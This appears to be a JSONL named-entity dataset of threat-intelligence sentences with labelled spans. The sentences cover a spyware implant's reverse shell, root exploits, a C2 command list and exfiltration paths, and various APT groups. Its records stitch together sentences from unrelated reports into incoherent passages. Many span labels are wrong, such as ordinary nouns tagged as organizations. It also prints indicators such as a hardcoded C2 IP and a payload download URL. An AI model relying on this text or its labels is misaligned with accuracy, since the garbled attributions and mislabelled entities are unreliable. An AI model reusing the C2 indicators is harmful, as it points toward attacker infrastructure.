{"text": "For now , we observe only one payload version for following the ARM CPUs : arm64-v8a , armeabi , armeabi-v7a . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon . Magic Hound : Rocket Kitten , Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish , Newscaster , Cobalt Gypsy , APT35 .", "spans": [{"start": 64, "end": 67, "label": "System"}, {"start": 75, "end": 84, "label": "System"}, {"start": 87, "end": 94, "label": "System"}, {"start": 97, "end": 108, "label": "System"}, {"start": 144, "end": 152, "label": "Malware"}, {"start": 208, "end": 210, "label": "Organization"}, {"start": 299, "end": 310, "label": "Organization"}, {"start": 313, "end": 326, "label": "Organization"}, {"start": 329, "end": 351, "label": "Organization"}, {"start": 354, "end": 372, "label": "Organization"}, {"start": 375, "end": 400, "label": "Organization"}, {"start": 403, "end": 413, "label": "Organization"}, {"start": 416, "end": 428, "label": "Organization"}, {"start": 431, "end": 436, "label": "Organization"}]}
{"text": "Note that in almost all cases , this payload file , contained in zip archives , is named \u2018 setting \u2019 or \u2018 setting.o \u2019 . While investigating KerrDown we found multiple RAR files containing a variant of the malware . Magic Hound is an Iranian-sponsored threat group operating primarily in the Middle East that dates back as early as 2014 .", "spans": [{"start": 91, "end": 98, "label": "Indicator"}, {"start": 106, "end": 115, "label": "Indicator"}, {"start": 140, "end": 148, "label": "Malware"}, {"start": 149, "end": 151, "label": "Organization"}, {"start": 215, "end": 226, "label": "Organization"}]}
{"text": "The main purpose of this module is providing reverse shell features on the device by connecting with the C & C server \u2019 s socket . Therefore , it is clear that the OceanLotus group works during weekdays and takes a break during the weekends . The group behind the campaign has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . menuPass : Stone Panda , APT10 , Red Apollo , CVNX , HOGFISH . menuPass is a threat group that appears to originate from China and has been active since approximately 2009 .", "spans": [{"start": 164, "end": 174, "label": "Organization"}, {"start": 429, "end": 437, "label": "Organization"}, {"start": 440, "end": 451, "label": "Organization"}, {"start": 454, "end": 459, "label": "Organization"}, {"start": 462, "end": 472, "label": "Organization"}, {"start": 475, "end": 479, "label": "Organization"}, {"start": 482, "end": 489, "label": "Organization"}, {"start": 492, "end": 500, "label": "Organization"}]}
{"text": "Reverse shell payload The payload is started by the main module with a specified host and port as a parameter that is hardcoded to \u2018 54.67.109.199 \u2019 and \u2018 30010 \u2019 in some versions : Alternatively , they could be hardcoded directly into the payload code : We also observed variants that were equipped with similar reverse shell payloads directly in the main APK /lib/ path . The group was first revealed and named by SkyEye Team in May 2015 . The group has targeted healthcare , defense , aerospace , and government sectors , and has targeted Japanese victims since at least 2014 .", "spans": [{"start": 133, "end": 146, "label": "Indicator"}, {"start": 155, "end": 160, "label": "Indicator"}, {"start": 378, "end": 383, "label": "Organization"}]}
{"text": "Equipped reverse shell payload with specific string After an in-depth look , we found that some versions of the reverse shell payload code share similarities with PRISM \u2013 a stealth reverse shell backdoor that is available on Github . OceanLotus's targets include China's maritime institutions , maritime construction , scientific research institutes and shipping enterprises . In 2016 and 2017 , the group targeted managed IT service providers , manufacturing and mining companies , and a university .", "spans": [{"start": 163, "end": 168, "label": "Malware"}, {"start": 225, "end": 231, "label": "Organization"}, {"start": 234, "end": 246, "label": "Organization"}, {"start": 271, "end": 292, "label": "Organization"}, {"start": 295, "end": 316, "label": "Organization"}, {"start": 319, "end": 349, "label": "Organization"}, {"start": 354, "end": 374, "label": "Organization"}]}
{"text": "Reverse shell payload from update_dev.zip Exploit payload At the same time , we found an important payload binary that is trying to exploit several known vulnerabilities and escalate privileges . RedDrip Team (formerly SkyEye Team) has been to OceanLotus to keep track of high strength , groupactivity , found it in the near future to Indochinese Peninsula countries since 2019 On April 1 , 2019 , RedDrip discovered a Vietnamese file name Hop dong sungroup.rar in the process of daily monitoring the attack activities of the OceanLotus . Moafee is a threat group that appears to operate from the Guandong Province of China .", "spans": [{"start": 27, "end": 41, "label": "Indicator"}, {"start": 244, "end": 254, "label": "Organization"}, {"start": 398, "end": 405, "label": "Organization"}, {"start": 526, "end": 536, "label": "Organization"}, {"start": 539, "end": 545, "label": "Organization"}]}
{"text": "According to several timestamps , this payload is used by implant versions created since 2016 . COCCOC is a Vietnam was founded in 2013 . Due to overlapping TTPs , including similar custom tools , Moafee is thought to have a direct or indirect relationship with the threat group DragonOK .", "spans": [{"start": 96, "end": 102, "label": "Organization"}, {"start": 197, "end": 203, "label": "Organization"}, {"start": 273, "end": 287, "label": "Organization"}]}
{"text": "It can also be downloaded by a specific command . In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks . SilverTerrier is a Nigerian threat group that has been seen active since 2014 .", "spans": [{"start": 111, "end": 121, "label": "Organization"}, {"start": 249, "end": 254, "label": "Organization"}, {"start": 257, "end": 278, "label": "Organization"}, {"start": 281, "end": 300, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 313, "end": 326, "label": "Organization"}]}
{"text": "The exploit payload contains following file components : Component name Description run_root_shell/arrs_put_user.o/arrs_put_user/poc Exploit ELF db Sqlite3 tool ELF device.db Sqlite3 database with supported devices and their constants needed for privilege escalation \u2018 device.db \u2019 is a database used by the exploit . Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file . SilverTerrier mainly targets organizations in high technology , higher education , and manufacturing .", "spans": [{"start": 84, "end": 132, "label": "Indicator"}, {"start": 165, "end": 174, "label": "Indicator"}, {"start": 269, "end": 278, "label": "Indicator"}, {"start": 345, "end": 352, "label": "Organization"}, {"start": 394, "end": 407, "label": "Organization"}]}
{"text": "It contains two tables \u2013 \u2018 supported_devices \u2019 and \u2018 device_address \u2019 . these threat actors targeted a number of government agencies Threat actors targeted a number of government agencies in East Asia . Operation Soft Cell is a group that is reportedly affiliated with China and is likely state-sponsored .", "spans": [{"start": 133, "end": 146, "label": "Organization"}, {"start": 168, "end": 178, "label": "Organization"}, {"start": 179, "end": 187, "label": "Organization"}, {"start": 213, "end": 222, "label": "Organization"}]}
{"text": "The first table contains 205 devices with some Linux properties ; the second contains the specific memory addresses associated with them that are needed for successful exploitation . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT . The group has operated since at least 2012 and has compromised high-profile telecommunications networks .", "spans": [{"start": 47, "end": 52, "label": "System"}, {"start": 183, "end": 192, "label": "Organization"}, {"start": 237, "end": 250, "label": "Vulnerability"}, {"start": 393, "end": 433, "label": "Organization"}]}
{"text": "You can find a full list of targeted models in the Appendix . Maudi Surveillance Operation which was previously reported in 2013 . Sowbug is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia , particularly government entities , since at least 2015 .", "spans": [{"start": 62, "end": 67, "label": "Organization"}, {"start": 131, "end": 137, "label": "Organization"}, {"start": 265, "end": 284, "label": "Organization"}]}
{"text": "Fragment of the database with targeted devices and specific memory addresses If the infected device is not listed in this database , the exploit tries to discover these addresses programmatically . specifically CVE-2018-0798 , before downloading subsequent payloads . Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan , the Philippines , and Hong Kong .", "spans": [{"start": 211, "end": 224, "label": "Vulnerability"}, {"start": 268, "end": 282, "label": "Organization"}]}
{"text": "After downloading and unpacking , the main module executes the exploit binary file . The dropped PE file has the distinctive file name 8.t\u201d . Tropic Trooper focuses on targeting government , healthcare , transportation , and high-tech industries and has been active since 2011 .", "spans": [{"start": 97, "end": 99, "label": "System"}, {"start": 135, "end": 139, "label": "Malware"}, {"start": 142, "end": 156, "label": "Organization"}, {"start": 178, "end": 188, "label": "Organization"}]}
{"text": "Once executed , the module attempts to get root privileges on the device by exploiting the following vulnerabilities : CVE-2013-2094 CVE-2013-2595 CVE-2013-6282 CVE-2014-3153 ( futex aka TowelRoot ) CVE-2015-3636 Exploitation process After an in-depth look , we found that the exploit payload code shares several similarities with the public project android-rooting-tools . The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above . Turla : Waterbug , WhiteBear , VENOMOUS BEAR , Snake , Krypton .", "spans": [{"start": 119, "end": 132, "label": "Vulnerability"}, {"start": 133, "end": 146, "label": "Vulnerability"}, {"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 177, "end": 182, "label": "Vulnerability"}, {"start": 187, "end": 196, "label": "Vulnerability"}, {"start": 199, "end": 212, "label": "Vulnerability"}, {"start": 438, "end": 446, "label": "Organization"}, {"start": 475, "end": 483, "label": "Organization"}, {"start": 505, "end": 510, "label": "Organization"}, {"start": 513, "end": 521, "label": "Organization"}, {"start": 524, "end": 533, "label": "Organization"}, {"start": 536, "end": 549, "label": "Organization"}, {"start": 552, "end": 557, "label": "Organization"}, {"start": 560, "end": 567, "label": "Organization"}]}
{"text": "Decompiled exploit function code fragment run_with_mmap function from the android-rooting-tools project As can be seen from the comparison , there are similar strings and also a unique comment in Italian , so it looks like the attackers created this exploit payload based on android-rooting-tools project source code . These conflicts have even resulted in Haftar leading an attack on the capital city in April . Turla is a Russian-based threat group that has infected victims in over 45 countries , spanning a range of industries including government , embassies , military , education , research and pharmaceutical companies since 2004 .", "spans": [{"start": 74, "end": 95, "label": "System"}, {"start": 275, "end": 296, "label": "System"}, {"start": 357, "end": 363, "label": "Organization"}, {"start": 413, "end": 418, "label": "Organization"}, {"start": 541, "end": 551, "label": "Organization"}, {"start": 554, "end": 563, "label": "Organization"}, {"start": 566, "end": 574, "label": "Organization"}, {"start": 602, "end": 626, "label": "Organization"}]}
{"text": "Busybox payload Busybox is public software that provides several Linux tools in a single ELF file . The attackers have targeted a large number of organizations globally since early 2017 . Heightened activity was seen in mid-2015 .", "spans": [{"start": 104, "end": 113, "label": "Organization"}]}
{"text": "In earlier versions , it operated with shell commands like this : Stealing WhatsApp encryption key with Busybox Social payload Actually , this is not a standalone payload file \u2013 in all the observed versions its code was compiled with exploit payload in one file ( \u2018 poc_perm \u2019 , \u2018 arrs_put_user \u2019 , \u2018 arrs_put_user.o \u2019 ) . Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . Turla is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware .", "spans": [{"start": 104, "end": 126, "label": "Malware"}, {"start": 323, "end": 332, "label": "Organization"}, {"start": 411, "end": 420, "label": "Organization"}, {"start": 450, "end": 455, "label": "Organization"}, {"start": 526, "end": 551, "label": "System"}, {"start": 556, "end": 563, "label": "Malware"}]}
{"text": "This is due to the fact that the implant needs to escalate privileges before performing social payload actions . Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities . Turla \u2019s espionage platform is mainly used against Windows machines , but has also been seen used against macOS and Linux machines .", "spans": [{"start": 113, "end": 120, "label": "Organization"}, {"start": 167, "end": 178, "label": "Organization"}, {"start": 181, "end": 188, "label": "Organization"}, {"start": 191, "end": 208, "label": "Organization"}, {"start": 213, "end": 222, "label": "Organization"}, {"start": 225, "end": 251, "label": "Organization"}, {"start": 254, "end": 262, "label": "Organization"}, {"start": 267, "end": 288, "label": "Organization"}, {"start": 291, "end": 301, "label": "Organization"}, {"start": 304, "end": 317, "label": "Organization"}, {"start": 320, "end": 336, "label": "Organization"}, {"start": 339, "end": 359, "label": "Organization"}, {"start": 362, "end": 383, "label": "Organization"}, {"start": 392, "end": 409, "label": "Organization"}, {"start": 422, "end": 438, "label": "Organization"}, {"start": 441, "end": 446, "label": "Organization"}, {"start": 492, "end": 499, "label": "System"}, {"start": 547, "end": 552, "label": "System"}, {"start": 557, "end": 562, "label": "System"}]}
{"text": "This payload is also used by the earlier versions of the implant . Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected . Winnti Group : Blackfly .", "spans": [{"start": 67, "end": 78, "label": "Organization"}, {"start": 199, "end": 211, "label": "Organization"}, {"start": 214, "end": 222, "label": "Organization"}]}
{"text": "It has similar functionality to the \u2018 AndroidMDMSupport \u2019 command from the current versions \u2013 stealing data belonging to other installed applications . Operation Parliament appears to be another symptom of escalating tensions in the Middle East region . Winnti Group is a threat group with Chinese origins that has been active since at least 2010 .", "spans": [{"start": 152, "end": 172, "label": "Organization"}, {"start": 254, "end": 266, "label": "Organization"}]}
{"text": "The payload will execute shell code to steal data from various applications . The attackers have taken great care to stay under the radar , imitating another attack group in the region . The group has heavily targeted the gaming industry , but it has also expanded the scope of its targeting .", "spans": [{"start": 82, "end": 91, "label": "Organization"}]}
{"text": "The example below steals Facebook data : All the other hardcoded applications targeted by the payload : Package name Name jp.naver.line.android LINE : Free Calls & Messages com.facebook.orca Facebook messenger com.facebook.katana Facebook com.whatsapp WhatsApp com.viber.voip Viber Parser payload Upon receiving a specific command , the implant can download a special payload to grab sensitive information from external applications . With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East . Some reporting suggests a number of other groups , including Axiom , APT17 , and Ke3chang , are closely linked to Winnti Group .", "spans": [{"start": 25, "end": 33, "label": "System"}, {"start": 122, "end": 143, "label": "Indicator"}, {"start": 144, "end": 172, "label": "System"}, {"start": 173, "end": 190, "label": "Indicator"}, {"start": 191, "end": 209, "label": "System"}, {"start": 210, "end": 229, "label": "Indicator"}, {"start": 230, "end": 238, "label": "System"}, {"start": 239, "end": 251, "label": "Indicator"}, {"start": 252, "end": 260, "label": "System"}, {"start": 261, "end": 275, "label": "Indicator"}, {"start": 276, "end": 281, "label": "System"}, {"start": 497, "end": 510, "label": "Organization"}, {"start": 704, "end": 709, "label": "Organization"}, {"start": 712, "end": 717, "label": "Organization"}, {"start": 724, "end": 732, "label": "Organization"}, {"start": 757, "end": 769, "label": "Organization"}]}
{"text": "The case where we observed this involved WhatsApp . The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware . Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists , activists , and dissidents since at least 2012 .", "spans": [{"start": 41, "end": 49, "label": "System"}, {"start": 56, "end": 63, "label": "Malware"}, {"start": 91, "end": 101, "label": "Malware"}, {"start": 188, "end": 202, "label": "Organization"}]}
{"text": "In the examined version , it was downloaded from : hxxp : //url [ . The malware starts communicating with the C&C server by sending basic information about the infected machine . Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates ( UAE ) government , but that has not been confirmed .", "spans": [{"start": 51, "end": 67, "label": "Indicator"}, {"start": 72, "end": 79, "label": "Malware"}, {"start": 87, "end": 113, "label": "Malware"}, {"start": 261, "end": 300, "label": "Organization"}]}
{"text": "] plus/Updates/tt/parser.apk The payload can be a .dex or .apk file which is a Java-compiled Android executable . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . Stolen Pencil is a threat group likely originating from DPRK that has been active since at least May 2018 .", "spans": [{"start": 93, "end": 100, "label": "System"}, {"start": 118, "end": 125, "label": "Malware"}, {"start": 136, "end": 144, "label": "Malware"}, {"start": 154, "end": 168, "label": "System"}, {"start": 186, "end": 195, "label": "Organization"}, {"start": 284, "end": 297, "label": "Organization"}]}
{"text": "After downloading , it will be loaded by the main module via DexClassLoader api : As mentioned , we observed a payload that exclusively targets the WhatsApp messenger and it does so in an original way . What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants\u2019 rights in Qatar and Nepal . The group appears to have targeted academic institutions , but its motives remain unclear .", "spans": [{"start": 148, "end": 166, "label": "System"}]}
{"text": "The payload uses the Android Accessibility Service to get information directly from the displayed elements on the screen , so it waits for the targeted application to be launched and then parses all nodes to find text messages : Note that the implant needs special permission to use the Accessibility Service API , but there is a command that performs a request with a phishing text displayed to the user to obtain such permission . We refer to this campaign and the associated actor as Operation Kingphish Malik\u201d , in one of its written forms in Arabic , translates to King\u201d . Strider : ProjectSauron . Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia , China , Sweden , Belgium , Iran , and Rwanda .", "spans": [{"start": 21, "end": 28, "label": "System"}, {"start": 487, "end": 506, "label": "Organization"}, {"start": 578, "end": 585, "label": "Organization"}, {"start": 588, "end": 603, "label": "Organization"}, {"start": 604, "end": 611, "label": "Organization"}]}
{"text": "Windows We have found multiple components that form an entire spyware system for the Windows platform . It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers\u2019 rights in Qatar . Putter Panda : APT2 , MSUpdater .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 85, "end": 92, "label": "System"}, {"start": 304, "end": 313, "label": "Organization"}, {"start": 448, "end": 460, "label": "Organization"}, {"start": 463, "end": 467, "label": "Organization"}, {"start": 470, "end": 479, "label": "Organization"}]}
{"text": "Name MD5 Purpose msconf.exe 55fb01048b6287eadcbd9a0f86d21adf Main module , reverse shell network.exe f673bb1d519138ced7659484c0b66c5b Sending exfiltrated data system.exe d3baa45ed342fbc5a56d974d36d5f73f Surrounding sound recording by mic update.exe 395f9f87df728134b5e3c1ca4d48e9fa Keylogging wow.exe It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA \u2019s 3rd General Staff Department ( GSD ) .", "spans": [{"start": 17, "end": 27, "label": "Indicator"}, {"start": 28, "end": 60, "label": "Indicator"}, {"start": 89, "end": 100, "label": "Indicator"}, {"start": 101, "end": 133, "label": "Indicator"}, {"start": 159, "end": 169, "label": "Indicator"}, {"start": 170, "end": 202, "label": "Indicator"}, {"start": 238, "end": 248, "label": "Indicator"}, {"start": 249, "end": 281, "label": "Indicator"}, {"start": 293, "end": 300, "label": "Indicator"}, {"start": 321, "end": 330, "label": "Organization"}, {"start": 517, "end": 529, "label": "Organization"}, {"start": 584, "end": 656, "label": "Organization"}, {"start": 659, "end": 662, "label": "Organization"}]}
{"text": "16311b16fd48c1c87c6476a455093e7a Screenshot capturing skype_sync2.exe 6bcc3559d7405f25ea403317353d905f Skype call recording to MP3 All modules , except skype_sync2.exe , are written in Python and packed to binary files via the Py2exe tool . In the course of this email correspondence , the attacker \u2014 Safeena\u201d \u2014 then sent what appeared to be invitations to access several documents on Google Drive . Rancor is a threat group that has led targeted campaigns against the South East Asia region .", "spans": [{"start": 0, "end": 32, "label": "Indicator"}, {"start": 54, "end": 69, "label": "Indicator"}, {"start": 70, "end": 102, "label": "Indicator"}, {"start": 103, "end": 108, "label": "System"}, {"start": 152, "end": 167, "label": "Indicator"}, {"start": 185, "end": 191, "label": "System"}, {"start": 227, "end": 233, "label": "System"}, {"start": 290, "end": 298, "label": "Organization"}, {"start": 400, "end": 406, "label": "Organization"}]}
{"text": "This sort of conversion allows Python code to be run in a Windows environment without pre-installed Python binaries . The attackers were meticulous in making their phishing page as credible as possible . Rancor uses politically-motivated lures to entice victims to open malicious documents .", "spans": [{"start": 31, "end": 37, "label": "System"}, {"start": 58, "end": 65, "label": "System"}, {"start": 100, "end": 106, "label": "System"}, {"start": 122, "end": 131, "label": "Organization"}, {"start": 204, "end": 210, "label": "Organization"}, {"start": 216, "end": 243, "label": "System"}]}
{"text": "msconf.exe is the main module that provides control of the implant and reverse shell feature . Among the targets of this campaign is the International Trade Union Confederation (ITUC) . RTM is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 151, "end": 176, "label": "Organization"}, {"start": 186, "end": 189, "label": "Organization"}]}
{"text": "It opens a socket on the victim \u2019 s machine and connects with a server-side component of the implant located at 54.67.109.199:6500 . Both in the attacks against ITUC and in other occasions , Operation Kingphish approached selected targets over social media , prominently Facebook , and engaged in chat conversations with them on and off , sometimes over a period of several months . The group uses a Trojan by the same name ( RTM ) .", "spans": [{"start": 112, "end": 130, "label": "Indicator"}, {"start": 161, "end": 165, "label": "Organization"}, {"start": 191, "end": 210, "label": "Organization"}, {"start": 244, "end": 256, "label": "System"}, {"start": 259, "end": 279, "label": "System"}, {"start": 400, "end": 406, "label": "Malware"}, {"start": 426, "end": 429, "label": "Organization"}]}
{"text": "Before connecting with the socket , it creates a malware environment in \u2018 APPDATA/myupd \u2019 and creates a sqlite3 database there \u2013 \u2018 myupd_tmp\\\\mng.db \u2019 : CREATE TABLE MANAGE ( ID INT PRIMARY KEY NOT NULL , Send INT NOT NULL , Keylogg INT NOT NULL , Screenshot INT NOT NULL , Audio INT NOT NULL ) ; INSERT INTO MANAGE ( ID , Send , Keylogg , Screenshot , Audio This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar . FIN4 is a financially motivated threat group that has targeted confidential information related to the public financial market , particularly regarding healthcare and pharmaceutical companies , since at least 2013 .", "spans": [{"start": 74, "end": 87, "label": "Indicator"}, {"start": 131, "end": 148, "label": "Indicator"}, {"start": 373, "end": 381, "label": "Malware"}, {"start": 521, "end": 525, "label": "Organization"}]}
{"text": ") VALUES ( 1 , 1 , 1 , 1 , 0 ) Finally , the malware modifies the \u2018 Software\\Microsoft\\Windows\\CurrentVersion\\Run \u2019 registry key to enable autostart of the main module . While there is a clear underlying Qatar migrant workers theme in Operation Sheep , it is also hypothetically possible that these attacks could have been perpetrated by a malicious actor affiliated to a different government with an interest in damaging the reputation of the State of Qatar . FIN4 is unique in that they do not infect victims with typical persistent malware , but rather they focus on capturing credentials authorized to access email and other non-public correspondence .", "spans": [{"start": 68, "end": 113, "label": "Indicator"}, {"start": 235, "end": 250, "label": "Organization"}, {"start": 461, "end": 465, "label": "Organization"}, {"start": 613, "end": 618, "label": "System"}]}
{"text": "The code contains multiple comments in Italian , here is the most noteworthy example : \u201c Receive commands from the remote server , here you can set the key commands to command the virus \u201d Here are the available commands : Name Description cd Change current directory to specified quit Close the socket nggexe Execute received command via Python \u2019 s subprocess.Popen ( ) without outputs ngguploads Upload specified file to the specified URL nggdownloads Download content from the specified URLs and save to specified file nggfilesystem Dump file structure of Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information .", "spans": [{"start": 338, "end": 344, "label": "System"}, {"start": 565, "end": 582, "label": "Organization"}, {"start": 681, "end": 696, "label": "Vulnerability"}, {"start": 764, "end": 768, "label": "Organization"}]}
{"text": "the C : path , save it to the file in json format and zip it nggstart_screen nggstop_screen Enable/disable screenshot module . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . The group has been active since at least 2008 and has targeted the restaurant , gaming , and hotel industries .", "spans": [{"start": 131, "end": 134, "label": "System"}, {"start": 143, "end": 154, "label": "Malware"}, {"start": 270, "end": 283, "label": "Organization"}, {"start": 286, "end": 295, "label": "Organization"}, {"start": 298, "end": 314, "label": "Organization"}, {"start": 321, "end": 337, "label": "Organization"}]}
{"text": "When enabled , it makes a screenshot every 25 seconds nggstart_key nggstop_key Enable/disable keylogging module nggstart_rec nggstop_rec Enable/disable surrounding sounds recording module ngg_status Send components status to the C & C socket * any other * Execute received command via Python \u2019 s subprocess.Popen ( ) , output result will be sent to the C & C socket . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . The group is made up of actors who likely speak Russian .", "spans": [{"start": 285, "end": 291, "label": "System"}, {"start": 402, "end": 413, "label": "Malware"}, {"start": 502, "end": 509, "label": "Malware"}]}
{"text": "All modules set hidden attributes to their files : Module Paths Exfiltrated data format msconf.exe % APPDATA % /myupd/gen/ % Y % m % d- % H % M % S_filesystem.zip ( file structure dump ) system.exe % APPDATA % /myupd/aud/ % d % m % Y % H % M % S.wav ( surrounding sounds ) update.exe % APPDATA % /myupd_tmp/txt/ % APPDATA % /myupd/txt/ % Y % m In theory , Shun Wang Technologies could have collected a third of China\u2019s population names and contact numbers if not more . FIN6 : ITG08 .", "spans": [{"start": 88, "end": 98, "label": "Indicator"}, {"start": 99, "end": 343, "label": "Indicator"}, {"start": 356, "end": 365, "label": "Organization"}, {"start": 470, "end": 474, "label": "Organization"}, {"start": 477, "end": 482, "label": "Organization"}]}
{"text": "% d- % H % M % S.txt ( keylogging ) wow.exe % APPDATA % /myupd/scr/ % Y % m % d- % H % M % S.jpg ( screenshots ) skype_sync2.exe % APPDATA % /myupd_tmp/skype/ % APPDATA % /myupd/skype/ yyyyMMddHHmmss_in.mp3 yyyyMMddHHmmss_out.mp3 ( skype calls records ) Moreover , we found one module written With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November\u2019s Single\u2019s Day and December\u2019s Asian online shopping fest . FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces .", "spans": [{"start": 207, "end": 229, "label": "Indicator"}, {"start": 333, "end": 342, "label": "Organization"}, {"start": 623, "end": 627, "label": "Organization"}]}
{"text": "in .Net \u2013 skype_sync2.exe . This paper will cover the discovery of this campaign , dubbed \u2018Operation Sheep\u2019 , and an analysis of SWAnalytics . This group has aggressively targeted and compromised point of sale ( PoS ) systems in the hospitality and retail sectors .", "spans": [{"start": 3, "end": 7, "label": "System"}, {"start": 10, "end": 25, "label": "Indicator"}, {"start": 90, "end": 107, "label": "Organization"}]}
{"text": "The main purpose of this module is to exfiltrate Skype call recordings . In mid-September , an app named \u2018Network Speed Master\u2019 stood out on our radar with its rather unusual behavior patterns . Leviathan : TEMP.Jumper , APT40 , TEMP.Periscope .", "spans": [{"start": 49, "end": 54, "label": "System"}, {"start": 105, "end": 127, "label": "Organization"}, {"start": 195, "end": 204, "label": "Organization"}, {"start": 207, "end": 218, "label": "Organization"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 229, "end": 243, "label": "Organization"}]}
{"text": "Just like the previous modules , it contains multiple strings in Italian . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . Leviathan is a cyber espionage group that has been active since at least 2013 .", "spans": [{"start": 80, "end": 86, "label": "Malware"}, {"start": 140, "end": 164, "label": "Malware"}, {"start": 167, "end": 173, "label": "Malware"}, {"start": 176, "end": 182, "label": "Malware"}, {"start": 185, "end": 198, "label": "Malware"}, {"start": 203, "end": 217, "label": "Malware"}, {"start": 220, "end": 229, "label": "Organization"}]}
{"text": "After launch , it downloads a codec for MP3 encoding directly from the C & C server : http : //54.67.109.199/skype_resource/libmp3lame.dll The skype_sync2.exe module has a compilation timestamp \u2013 Feb 06 2017 and the following PDB string : \\\\vmware-host\\Shared Folders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb network.exe is a It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in . The group generally targets defense and government organizations , but has also targeted a range of industries including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities in the United States , Western Europe , and along the South China Sea .", "spans": [{"start": 86, "end": 138, "label": "Indicator"}, {"start": 143, "end": 158, "label": "Indicator"}, {"start": 239, "end": 259, "label": "Indicator"}, {"start": 260, "end": 338, "label": "Indicator"}, {"start": 339, "end": 350, "label": "Indicator"}, {"start": 374, "end": 387, "label": "Malware"}, {"start": 416, "end": 427, "label": "Malware"}]}
{"text": "module for submitting all exfiltrated data to the server . With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d . Lotus Blossom : DRAGONFISH , Spring Dragon .", "spans": [{"start": 83, "end": 94, "label": "Malware"}, {"start": 100, "end": 104, "label": "Malware"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 233, "label": "Organization"}, {"start": 236, "end": 249, "label": "Organization"}]}
{"text": "In the observed version of the implant it doesn \u2019 t have an interface to work with the skype_sync2.exe module . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . Lotus Blossom is a threat group that has targeted government and military organizations in Southeast Asia .", "spans": [{"start": 87, "end": 102, "label": "Indicator"}, {"start": 127, "end": 143, "label": "Malware"}, {"start": 291, "end": 304, "label": "Organization"}]}
{"text": "network.exe submitting to the server code snippet Code similarities We found some code similarities between the implant for Windows and other public accessible projects . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . Machete : El Machete .", "spans": [{"start": 0, "end": 11, "label": "Indicator"}, {"start": 124, "end": 131, "label": "System"}, {"start": 174, "end": 193, "label": "Malware"}, {"start": 196, "end": 207, "label": "Malware"}, {"start": 219, "end": 236, "label": "Malware"}, {"start": 280, "end": 287, "label": "Organization"}, {"start": 290, "end": 300, "label": "Organization"}]}
{"text": "https : //github.com/El3ct71k/Keylogger/ It appears the developers have copied the functional part of the keylogger module from this project . Operation Sheep is the first campaign we have observed in the wild that abuses similar concept since our MitD publication . Machete is a group that has been active since at least 2010 , targeting high-profile government entities in Latin American countries .", "spans": [{"start": 0, "end": 40, "label": "Indicator"}, {"start": 143, "end": 158, "label": "Organization"}, {"start": 267, "end": 274, "label": "Organization"}]}
